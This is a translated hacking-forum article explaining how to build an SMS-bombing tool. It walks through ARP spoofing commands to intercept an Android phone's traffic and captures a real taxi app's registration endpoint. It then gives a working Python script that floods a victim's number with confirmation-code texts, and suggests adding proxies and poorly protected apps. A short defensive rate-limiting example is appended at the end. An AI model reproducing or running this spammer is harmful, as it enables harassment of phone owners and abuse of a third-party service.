Today I will tell you how to write an SMS spammer. The Spammer-Grab script prompted me to write this article. Its essence is to force a service to send confirmation codes to the victim's phone. I didn't check whether it works, but if you believe people, it does.
I'll say right away that we won't be able to set the message text, but the point of the spammer is not to deliver the text we need, but to get to the person who is targeted by the spam attack.
Formulation of the problem:
To implement our plan, we need to find an Android application that has registration by phone number with a confirmation code delivered by SMS. This is actually the most difficult part of the whole scheme. Then we need to capture the HTTP request, with its parameters, that is sent on registration, and write a small script that makes as many requests as we need.
Implementing the plan:
First, find an application that meets our requirements. Applications with this functionality usually provide some kind of service. The first thing that came to mind was ordering a taxi. We go to Google Play, search for "Taxi" and start looking for an application that suits us. It is better not to take those at the top; pay attention to applications with a poor rating. Scrolling down a couple of screens, we come across the application "Taxi Magnet".
Install it on your phone. Once we have checked that the application's functionality suits us, the traffic interception stage begins. You could try to do this on the Android device itself, but I don't have root privileges, so I'll go another way. You can find your own way to intercept the traffic; it is not necessary to do it like me. The first thing that came to my mind was ARP spoofing. We connect the Android device and the laptop to our access point and carry out ARP spoofing.
ARP spoofing:
android ip: 192.168.10.107 (your IP may differ)
router ip: 192.168.10.1 (your IP may differ)
Packet forwarding must be enabled for an ARP spoofing attack.
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
Then we carry out the attack itself.
Code:
arpspoof -i eth0 -t [android ip] [router ip]
arpspoof -i eth0 -t [router ip] [android ip]
-i: specifies the interface connected to the local network
-t: specifies the IP address of the host whose ARP cache is to be "poisoned".
Now all the traffic from the Android device goes through us. Run Wireshark and select your interface; mine is eth0. In the filter field, enter ip.addr == 192.168.10.107 and http (specify the IP of your Android device).
We return to the application and perform the registration request.
Go to Wireshark and see the new HTTP requests. Note the POST request whose Info field contains a part of the URL with create-invite. We request the code several times to make sure this is the request we need. To be sure we have found the right request, you can check it by hand using the Advanced REST client.
Consider the request in more detail. Right-click on it, point to Follow in the menu that appears and select HTTP Stream in the new list.
A window opens with information similar to this:
Code:
POST /est-taxi/create-invite/1.0/ HTTP/1.1
Content-Length: 103
Content-Type: application/x-www-form-urlencoded
Host: 5.9.150.148:8200
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

invite={"phone-number":"+XXXXXXXXXXXX","application-acronym":"TAXI_MAGNIT"}

HTTP/1.1 200 OK
Accept-Charset: UTF-8
Content-Type: text/plain; charset=UTF-8
Content-Length: 29
Connection: keep-alive

{"result":{"result-state":0}}
Let's look at what we need from this:
Code:
Request type: POST
URL the request is sent to: http://5.9.150.148:8200/est-taxi/create-invite/1.0/
Required parameters to pass: invite={"phone-number":"+XXXXXXXXXXXX","application-acronym":"TAXI_MAGNIT"}
Server response on a successful send: {"result":{"result-state":0}}
At this stage we have all the data we need (testing the request showed that the minimum pause between repeated SMS sends is 10 seconds). Now we can start writing the code. I chose Python as the programming language.
Python:
#!/usr/bin/python
# coding=utf-8
import requests, argparse, json, time


# Function that processes the passed parameters
def options():
    parser = argparse.ArgumentParser(prog='SMSSpammer', description="The script sends spam messages via SMS",
                                     epilog='SMS Spammer script by n3d.b0y for Grey Section')
    parser.add_argument('--number', '-n', required=True, help='Phone number (example: 79006403861)')
    parser.add_argument('--limit', '-l', type=int, default=3,
                        help='Limit SMS (default: 3)')
    parser.add_argument('--delay', '-d', type=int, default=20,
                        help='Delay time in seconds (default: 20)')
    return parser.parse_args()


# Sends the POST request with parameters. The function takes a phone number in the format 79006403861.
def post_requests(number):
    r = requests.post('http://5.9.150.148:8200/est-taxi/create-invite/1.0/',
                      data={'invite': '{"phone-number":"+' + number + '","application-acronym":"TAXI_MAGNIT"}'})
    return json.loads(r.text)


def main():
    # Get the passed parameters
    params = options()
    inc = 0
    # The loop runs as many iterations as were passed in the limit parameter
    while inc < params.limit:
        # Pass the phone number and send the POST request
        response = post_requests(params.number)
        # If the response is positive print OK, if there is an error print Error
        if int(response['result']['result-state']) == 0:
            print '+' + params.number + ' - OK'
        else:
            print '+' + params.number + ' - Error'
        inc += 1
        # Pause before the next request
        time.sleep(params.delay)


if __name__ == '__main__':
    main()
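So we wrote our spammer. As you can see, there is nothing complicated about it. It could be improved by adding proxy support and a few more services so that the spam goes out without delay intervals, but that is outside this topic. I did not find this application on the first try; it was the third in a row. Applications with a good rating have IP blocking systems and 15-minute limits on sending an SMS again. But if you have an extra hour, you can easily find a couple of such applications. I hope I did not waste my time and you found this interesting to read.
By the way, pay attention to the design of the application. In theory, all taxi applications with this design will allow repeated SMS sending without blocking, since such applications are stamped out by builders that come with a CRM for receiving taxi orders. I know this for sure, since 5 years ago I worked with taxi drivers who wanted their own CRM and an independent Android application; at that time they had just such an application, which could be built directly in the CRM.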
Taken from codeby
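The create-invite endpoint shown above accepts repeated requests for the same number, which is the gap the whole article relies on. The following is an added example, not code from the original article or from the application: a server-side throttle for a confirmation-code endpoint that limits by phone number as well as by client IP, so rotating addresses does not help. All names and thresholds are assumptions, apart from the 15-minute window the article mentions.

```python
from collections import defaultdict, deque

COOLDOWN = 60            # assumed: minimum seconds between SMS to one number
NUMBER_WINDOW = 15 * 60  # the 15-minute re-send limit the article mentions
NUMBER_MAX = 3           # assumed: SMS per number per window
IP_WINDOW = 60 * 60      # assumed
IP_MAX = 10              # assumed: requests per client IP per window

def normalize(phone):
    """Key on digits only so '+7 000...' and '7000...' share one counter."""
    return "".join(ch for ch in phone if ch.isdigit())

class InviteThrottle:
    def __init__(self):
        self.by_number = defaultdict(deque)  # digits -> times an SMS was sent
        self.by_ip = defaultdict(deque)      # client IP -> times of all requests

    @staticmethod
    def _prune(times, now, window):
        while times and now - times[0] >= window:
            times.popleft()

    def check(self, phone, client_ip, now):
        """Return (allowed, reason); record the send when allowed."""
        sent = self.by_number[normalize(phone)]
        seen = self.by_ip[client_ip]
        self._prune(sent, now, NUMBER_WINDOW)
        self._prune(seen, now, IP_WINDOW)
        seen.append(now)  # refused requests also count against the IP
        if len(seen) > IP_MAX:
            return False, "ip_limit"
        if sent and now - sent[-1] < COOLDOWN:
            return False, "cooldown"
        if len(sent) >= NUMBER_MAX:
            return False, "number_limit"
        sent.append(now)
        return True, "sent"

def replay(events):
    """Run constructed (time, phone, ip) events through a fresh throttle."""
    throttle = InviteThrottle()
    return [throttle.check(phone, ip, t)[1] for t, phone, ip in events]

# Constructed traffic: one number hit every 20 s (the script's default delay),
# each request from a different documentation-range IP.
EVENTS = [(i * 20, "+70000000000", "203.0.113.%d" % i) for i in range(12)]
```

Replaying `EVENTS` lets only three of the twelve requests through, even though every request arrives from a new address; a per-IP limit alone would have passed all of them.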